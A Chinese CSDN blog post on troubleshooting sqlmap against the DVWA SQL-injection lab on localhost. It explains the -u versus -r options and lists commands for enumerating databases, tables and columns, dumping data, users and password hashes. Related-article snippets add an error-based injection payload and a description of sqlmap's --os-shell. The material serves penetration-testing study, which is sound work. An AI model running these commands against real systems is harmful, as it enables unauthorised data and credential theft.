sqlmap问题及解决办法

最新推荐文章于 2025-03-14 19:00:00 发布
最新推荐文章于 2025-03-14 19:00:00 发布
阅读量1.7w 收藏 41
点赞数 6
文章标签: 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43590262/article/details/117229524
版权
博主分享了在使用SQLMap进行DVWA低级SQL注入时的困惑,起初因为命令输入错误导致失败,最终通过正确理解SQLMap命令结构——区分URL与响应数据选项,成功进行了注入。详尽列举了SQLMap的注入命令及其用法,提醒读者注意命令使用的关键细节。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

真好,一个sqlmap注入问题困扰我一周,最后发现命令给错了。
在这里插入图片描述

事情是这样子的:
利用sqlmap对DVWA中Low进行SQL注入

输入: python sqlmap.py -u http://127.0.0.1/DVWA-master/vulnerabilities/sqli/?id=1

报错:不可注入…提示
在这里插入图片描述
后来我根据提示中的命令重新输入了一次,发现还是有问题(单独加cookie也不行)
在这里插入图片描述
吐了呀,一直以为环境有问题,sqlmap和python又重装了一遍。
然后用kali虚拟机注入,都一样结果。

直到今天,用一个带上一个响应包注入成功了
?在这里插入图片描述

切记: sqlmap.py -u 后面是跟URL
sqlmap.py -r 后面是跟响应数据
sqlmap进行注入时,最好使用-r

最后再复习一下sqlmap注入命令:

1、是否存在注入点

python sqlmap.py -r “响应包路径”

2、获取注入点所有数据库

python sqlmap.py -r “响应包路径” --dbs

3、获取当前使用的数据库

python sqlmap.py -r “响应包路径” --current-db --batch

4、获取数据库中的表

python sqlmap.py -r “响应包路径” --table -D “数据库名” --batch

5、获取表中的字段信息

python sqlmap.py -r “响应包路径” --columns -T “表名” -D “获取的数据库名” --batch

6、获取字段具体信息

python sqlmap.py -r “响应包路径” --dump -C “字段名(可多个)” --columns -T “表名” -D “数据库名” --batch

7、当前使用的账户

python sqlmap.py -r “响应包路径” --current-user

8、列出所有使用过的账户

python sqlmap.py -r “响应包路径” –users

9、
mysql的登录账户和密码

python sqlmap.py -r “响应包路径” –passwords

陌橙
关注
史上最详细的sqlmap使用教程
大河之犬的博客
09-19 5万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入
sqlmapsqlmapapi
十五年游戏主程转渗透之路
04-12 6003
sqlmapapi,,sqlmapapi二次封装原理和实操
kali最新版本中sqlmap打不开 not found解决方法
K_essi的博客
07-31 6388
我前不久将我的kali更新了一下更新完后发现sqlmap打不开在命令行输入sqlmap然后它提示我没有这个文件或目录然后在应用程序那一栏打开也提示我 Not found  但是我locate一下sqlmap发现还是有很多sqlmap的文件存在但是它们很多都是空的。 解决方法:直接 apt-get install sqlmap 如果不行的可以先更新一下它的源(建议先更新源) 更新源具体可以看一...
解决sqlmap无法正常使用
最新发布
m0_73318922的博客
03-14 475
 本次是为了记录使用sqlmap失败后我的重新安装过程,希望可以给有着同样问题的小伙伴们一点参考*~(^-^)~*
sqlmap报错注入
weixin_44110913的博客
04-07 3904
0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成。 所有的注入原理都是一样,即用户输入被拼接执行。但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入。 0x01概念 报错型注入的利用大概有以下3种方式: 复制代码 1:?id=2’ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (...
关于sqlmap 新版本1.5.10.13跑不出数据 问题的解决
keaidxxn的博客
10-11 2958
关于sqlmap 新版本1.5.10.13跑不出数据 问题的解决 刚开始跑数据库 首先运行命令: python3 sqlmap.py -u http://192.168.81.211/sqli-labs/Less-3/?id=1 --dbs 得到以下数据: 这里刚开始以为是系统相关的防护,就没有在意。 跑某个数据库下面的表名 运行命令: python3 sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 -D security --tables 发
明明有注入,工具就是跑不出来,你说虐不虐,你就说虐不虐
chengman3837的博客
01-04 1243
事情是这样的,上次记得哪个表哥在坛子里发了99999。。。。(此处省略n个9)注入点,我兴致冲冲的下载下来,发现随便打开一个都是 然后我的心情是这样的: 但是看到999999。。。(此处省略n个9)的注入点,直接扔了也怪可惜的,写一个python脚本跑一下,response响应码只...
关于kali使用sqlmap工具对sqli-labs-master进行sql注入时出现错误“No route to host”的解决办法
qq_58018041的博客
05-22 1068
在kali中使用sqlmap工具对sqli-labs-master进行sql注入时出现错误“No route to host”,解决办法是将kali中原有的sqlmap卸载重装。2、切换到目录/usr/share下查看是否存在sqlmap工具。4、在/usr/share目录下再次查看,确认删除成功。6、测试一下进行sql注入是否还会出错,已经没有报错了。1、进入root权限下,避免权限不够。5、重新安装sqlmap工具。3、删除sqlmap工具。
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
SQLMap正是为了解决这一问题而设计的,它可以帮助安全研究人员和渗透测试人员快速有效地识别和利用SQL注入漏洞。 在描述中提到的"sqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz"是SQLMap的一个特定版本,版本号为...
sqlmap报错解决
10-14
以下是一些常见的解决方法: 1. 检查目标网站是否可访问,网络是否正常。 2. 检查sqlmap命令是否正确,参数是否正确。 3. 检查目标网站是否存在注入漏洞,可以使用其他工具进行验证。 4. 如果是WAF拦截导致的报错,...
sqlmap汉化版
07-30
总结来说,SQLMap汉化版是安全研究和测试人员的强大武器,它简化了SQL注入测试过程,扩大了使用者群体,让更多的中国用户能够有效地发现并解决网站的安全问题。通过熟练掌握和运用SQLMap,我们可以提高网络环境的...
SQL 注入之报错及盲注及使用sqlmap 注入
weixin_52281518的博客
02-11 4687
报错注入 报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中 Updatexml() 函数用法:updatexml(XML_document,XPath_string,new_value); XML_document 是String格式,为XML文档对象的名称,中文名为Doc XPath_string XPath格式的字符串 new_value String格式,替换查找到的符合条件的数据 我们通常在第二个xpath参数填写我们要查询的内容。 Up
sqlmap)【sqli-labs靶场1-4】GET请求、错误注入、单引号、双引号、括号闭合、字符型、整型
05-26 1101
【sqllabs靶场】sqlmap
sqlmap --os-shell选项原理解析
来日可期的博客
10-18 2531
sqlmap的--os-shell在mysql数据库中的原理,是往服务器上写入了两个php,其中一个提供了文件上传的页面,可以通过这个上传页面上传脚本文件到当前目录下。另外一个则是返回了可以让我们执行系统命令的命令行,命令行也可以在网页url中通过对cmd参数传参执行系统命令。
Windows中cmd命令界面执行sqlmap总是报错“missing a mandatory option(......)”
weixin_67327819的博客
07-07 3022
windows中sqlmap配置path环境变量后仍然报错“missing a mandatory option(......)”
win版本的sqlmap报错解决
weixin_42075643的博客
01-29 7579
原来好好地环境突然报如下错: 查了好久资料,竟然没人遇到过 解决方法: python sqlmap.py --update 没想到吧,完美解决,原来是版本低的原因,我也是醉了,以此记录下。。。
关于 SQLMAP报错如何解决
zengcaomeiii的博客
07-01 1976
11
SQL注入——渗透day07
qq_62716256的博客
09-01 1101
wql注入
SQLMap 报错注入实战指南
m0_57836225的博客
02-25 1087
通过本文的介绍,我们了解了报错注入的原理,以及如何使用 SQLMap 进行报错注入来检测和利用 SQL 注入漏洞。SQLMap 的强大功能可以帮助我们快速、准确地发现和利用 SQL 注入漏洞,但同时也需要我们在合法、合规的前提下进行使用。希望本文对大家在 Web 安全测试方面有所帮助。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值